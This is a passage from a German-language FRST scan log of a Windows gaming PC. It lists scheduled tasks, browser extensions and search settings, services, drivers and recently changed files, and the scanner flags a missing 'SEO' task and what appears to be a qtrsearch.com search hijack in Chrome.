Task: {B43D8D56-45EB-4D1E-91B8-63CF957E1173} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {833377F9-8375-488D-9096-CF4605EB48C5} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {15469283-290A-4C91-A80D-973776316BD4} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {54E56090-CE3D-4B15-A9F5-A7DA596CFE18} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1000 => C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (Keine Datei)
Task: {3246FB24-FF9D-4B54-95BD-653EE03503A7} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {46979F62-4655-4018-955E-9BF1D88DDF97} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {64E3E2E2-E8DF-4744-BD6F-EF5E97162EE2} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1693322873 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {CF648919-4154-44DE-BFE9-9DF87ED8EC9C} - System32\Tasks\Opera GX scheduled Autoupdate 1691520674 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software)
Task: {EBAC0C4B-4BF7-483A-BD3B-1E4EB3E0E848} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2369544 2024-07-08] (Overwolf Ltd -> Overwolf LTD) -> C:\Program Files (x86)\Overwolf\/RunningFrom Schedule
Task: {1BC7AD52-96F9-4C93-AC9B-BFE2E3FFC697} - System32\Tasks\PowerToys\Autorun for skysc => C:\Program Files\PowerToys\PowerToys.exe [1194016 2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
Task: {1BF364AE-DAB2-4D3F-9DAC-3D957CB25BD6} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360 for Gamers\Upgrade.exe [2353000 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32} - System32\Tasks\SEO => C:\Users\skysc\AppData\Roaming\SEO\SEO.exe (Keine Datei) <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpDomain] Speedport_W_724V_09011603_06_010
Edge:
=======
Edge DefaultProfile: Profile 1
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default [2024-07-19]
Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2024-07-22]
Edge HomePage: Profile 1 -> hxxp://www.google.com/
Edge NewTab: Profile 1 -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Edge DefaultSearchURL: Profile 1 -> hxxps://www.bing.com/search?PC=U523&q={searchTerms}
Edge Extension: (Microsoft Rewards) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\bnplfnhcidhhdapmblniehfaaompjlck [2024-07-19]
Edge Extension: (Beautiful New Tab) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke [2024-07-22]
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]
FireFox:
========
FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.20 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR Profile: C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default [2024-07-22]
CHR DefaultSearchURL: Default -> hxxps://qtrsearch.com/search?q={searchTerms}&s=rg&u=%USERID%
CHR DefaultSearchKeyword: Default -> qtr
CHR DefaultSuggestURL: Default -> hxxps://qtrsearch.com/suggest?q={searchTerms}
CHR Extension: (the web) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji [2024-07-22]
CHR Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-05-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2024-05-27]
Opera:
=======
StartMenuInternet: (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001) Opera GXStable - "C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe"
Brave:
=======
BRA Profile: C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block First Party Filters (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\adcocjohghhfpidemphmcmlmhnfgikei [2024-07-20]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2024-07-20]
BRA Extension: (Brave NTP background images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2024-04-14]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bbefpembgddgdihpkcidgdgiojjlchji [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Fanboy's Mobile Notifications (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bfpgedeaaibpoidldhjcknekahbikncb [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Cookie (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\cdbbhgbmjhfnhnmgeddbliobbofkgdhe [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Regional Catalog)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\gkboaolpopklhgplhaaiboijnklogmbc [2024-07-20]
BRA Extension: (Brave NTP Super Referrer mapping table) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block Updater (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\iodkpdagapdfkphljnddpjlldadblomo [2024-07-20]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\jcncoheihebhhiemmbmpfhkceomfipbj [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Germany (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\lfmefmifdjlfneapckmpkinmlofjehbp [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Resources)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\mfddibmblmbccpadfndgakiopmmhebop [2024-07-20]
BRA Extension: (Brave NTP sponsored images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\obbokncgfcbepeipkhpdepjjoncelefj [2024-07-20]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [177392 2023-09-14] (RealDefense, LLC -> SUPERAntiSpyware.com)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [15772456 2023-12-03] (BattlEye Innovations e.K. -> )
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 BraveElevationService; C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\elevation_service.exe [2688024 2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11988424 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
S3 ComboCleaner.Guard; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.Guard.exe [144616 2024-06-04] (RCS LT UAB -> RCS LT)
S3 ComboCleaner.WinService; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.WinService.exe [152296 2024-06-04] (RCS LT UAB -> RCS LT)
R2 Easy Connection to Screen; C:\Program Files\Samsung\Easy Connection to Screen\Service.exe [367816 2023-01-13] (Samsung Electronics CO., LTD. -> )
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [955816 2023-10-01] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.)
S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncHelper.exe [3522992 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [347408 2023-11-30] (Underwriters Laboratories Inc. -> Futuremark)
R2 LightKeeperService; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe [92768 2023-05-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [8901528 2024-07-01] (Malwarebytes Inc. -> Malwarebytes)
S3 MBVpnTunnelService; C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe [3073888 2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe [1377416 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 MSIREGISTER_MR; C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe [2019504 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Case_Service; C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe [74336 2023-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Center_Service; C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe [154216 2023-08-17] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 MSI_Companion_Service; C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe [142648 2021-04-08] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Super_Charger_Service; C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe [37104 2022-05-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 MSI_VoiceControl_Service; C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe [36880 2023-04-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 Mystic_Light_Service; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe [37616 2022-04-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe [344888 2024-03-04] (NortonLifeLock Inc. -> NortonLifelock Inc.)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe [1059176 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe [1275528 2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\OneDriveUpdaterService.exe [3864080 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2369544 2024-07-08] (Overwolf Ltd -> Overwolf LTD)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe [3236728 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe [133688 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 DFWSIDService; C:\ProgramData\Wondershare\wsServices\WsidService.exe [X]
S2 ElevationService; C:\ProgramData\Wondershare\wsServices\ElevationService.exe [X]
S4 EsgShKernel; "C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe" [X]
S2 ShMonitor; "C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe" [X]
S2 WirelessBackupService; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Basic - Deutsch\Addins\Recovery\WirelessBackupService.exe [X]
S2 Wondershare InstallAssist; C:\ProgramData\Wondershare\Service\InstallAssistService.exe [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [39272 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [55608 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [800672 2023-10-27] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\BASHDefs\20231204.001\BHDrvx64.sys [1706512 2023-09-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [532480 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [184320 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [106496 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 ccSet_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\ccSetx64.sys [198288 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [84640 2023-03-21] (Microsoft Windows Hardware Compatibility Publisher -> wch.cn)
R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2023-08-18] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [527832 2023-08-06] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 EnigmaFileMonDriver; C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys [88736 2024-07-18] (Microsoft Windows Hardware Compatibility Publisher -> EnigmaSoft Limited)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [159720 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2023-08-18] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
S3 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [177056 2021-10-10] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender LLC)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\IPSDefs\20231201.064\IDSvia64.sys [1554400 2023-10-19] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [26168 2021-01-12] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 mbamchameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [221264 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [21480 2024-06-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239576 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [19000 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
S3 Netaapl; C:\Windows\System32\drivers\netaapl64.sys [23040 2023-08-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
S3 nsvst_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\nsvst.sys [57120 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R3 NTIOLib_CC_Clock; C:\Program Files (x86)\MSI\MSI Center\Lib\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\MSI Center\Lib\SYS\NTIOLib_X64.sys [32424 2023-07-31] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\MSI Center\Super Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Lib\NTIOLib_X64.sys [32488 2023-11-20] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation)
R3 rt68cx21; C:\Windows\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_e41dba7ae72d1e1a\rt68cx21x64.sys [458168 2021-10-05] (Microsoft Windows Hardware Compatibility Publisher -> Realtek)
S3 rtcx21; C:\Windows\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_516e5c9b75c49dc2\rtcx21x64.sys [539648 2022-05-06] (Microsoft Windows -> Realtek)
S1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [18160 2023-08-25] (RealDefense, LLC -> SUPERAdBlocker.com and SUPERAntiSpyware.com)
S1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [15600 2023-08-25] (RealDefense, LLC -> SUPERAdBlocker.com and SUPERAntiSpyware.com)
R3 SRTSP; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSP64.SYS [960640 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SRTSPX; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSPX64.SYS [52864 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R0 SymEFASI; C:\Windows\System32\drivers\NGCx64\1618020.006\SYMEFASI64.SYS [2180248 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S0 SymELAM; C:\Windows\System32\drivers\NGCx64\1618020.006\SymELAM.sys [36016 2024-03-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Broadcom)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100328 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.23.5.106\SymPlatform\SymEvnt.sys [722400 2022-06-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymIRON; C:\Windows\System32\drivers\NGCx64\1618020.006\Ironx64.SYS [306872 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymNetS; C:\Windows\System32\drivers\NGCx64\1618020.006\symnets.sys [492720 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [633264 2022-04-16] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 UsbNcm; C:\Windows\System32\drivers\UsbNcm.sys [167936 2023-11-15] (Microsoft Windows -> )
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [21968 2024-07-16] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
U5 WdDevFlt; C:\Windows\System32\Drivers\WdDevFlt.sys [169232 2022-05-07] (Microsoft Windows -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [602520 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [105864 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\wpCtrlDrv.sys [1016792 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2024-07-22 16:20 - 2024-07-22 16:20 - 000720948 _____ C:\Windows\system32\perfh007.dat
2024-07-15 17:37 - 2024-07-15 17:37 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2024-07-09 20:41 - 2024-07-09 20:41 - 000025684 _____ C:\Windows\system32\IntegratedServicesRegionPolicySet.json
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2024-07-22 21:18 - 2024-05-27 21:26 - 000000000 ____D C:\FRST
2024-07-22 21:18 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2024-07-22 21:16 - 2024-06-04 17:30 - 000000000 ____D C:\Users\skysc\AppData\Local\Malwarebytes
2024-07-22 21:14 - 2023-08-08 19:27 - 000000000 ____D C:\Users\skysc\AppData\Local\Norton
2024-07-22 21:13 - 2023-08-07 15:06 - 000000000 ____D C:\Program Files (x86)\Steam
2024-07-22 20:53 - 2023-08-08 23:11 - 000000000 ____D C:\Users\skysc\AppData\Roaming\vlc
2024-07-22 20:52 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemTemp
2024-07-22 19:50 - 2023-08-09 20:01 - 000000000 ____D C:\Users\skysc\OneDrive\Microsoft Edge Drop Files\Dokumente\Audioaufzeichnungen
2024-07-22 19:02 - 2023-11-11 18:24 - 000000000 ____D C:\Users\skysc\AppData\Roaming\discord
2024-07-22 18:54 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\D3DSCache
2024-07-22 17:02 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\AppReadiness
2024-07-22 16:20 - 2022-06-22 10:23 - 001662900 _____ C:\Windows\system32\PerfStringBackup.INI
2024-07-22 16:20 - 2022-05-07 07:22 - 000000000 ____D C:\Windows\INF
2024-07-22 16:18 - 2024-04-02 21:44 - 000000000 ____D C:\Windows\system32\Tasks\Norton 360
2024-07-22 16:12 - 2023-09-19 15:17 - 000000000 ____D C:\Users\skysc\AppData\Local\Overwolf
2024-07-22 16:12 - 2023-08-07 14:12 - 000000000 ___RD C:\Users\skysc\OneDrive
2024-07-22 16:11 - 2024-06-09 14:12 - 000000000 ____D C:\Windows\system32\Tasks\PowerToys
2024-07-22 16:11 - 2023-08-21 17:42 - 000000000 ____D C:\Users\skysc\AppData\Local\CrashDumps
2024-07-22 16:11 - 2022-06-22 10:35 - 000000000 ____D C:\ProgramData\NVIDIA
2024-07-22 16:11 - 2022-06-22 10:16 - 000012288 ___SH C:\DumpStack.log.tmp
2024-07-22 16:11 - 2022-06-22 10:16 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2024-07-22 16:10 - 2022-05-07 07:17 - 000786432 _____ C:\Windows\system32\config\BBI
2024-07-22 16:06 - 2023-08-07 17:42 - 000000000 ____D C:\Users\skysc\AppData\Roaming\.minecraft
2024-07-22 15:43 - 2023-08-07 14:12 - 000000000 ____D C:\Users\skysc
2024-07-22 14:42 - 2022-05-07 07:17 - 000032768 _____ C:\Windows\system32\config\ELAM
2024-07-21 16:39 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2024-07-20 21:46 - 2022-05-07 07:24 - 000000000 ___HD C:\Program Files\WindowsApps
2024-07-20 21:23 - 2024-06-02 18:45 - 000001607 _____ C:\Windows\system32\config\VSMIDK
2024-07-20 21:23 - 2023-08-08 14:20 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2024-07-20 17:58 - 2022-06-22 10:18 - 000000000 ____D C:\ProgramData\Packages
2024-07-20 15:58 - 2023-08-07 17:35 - 000000000 ____D C:\XboxGames
2024-07-20 15:58 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\Packages
2024-07-20 15:31 - 2023-11-09 14:14 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002
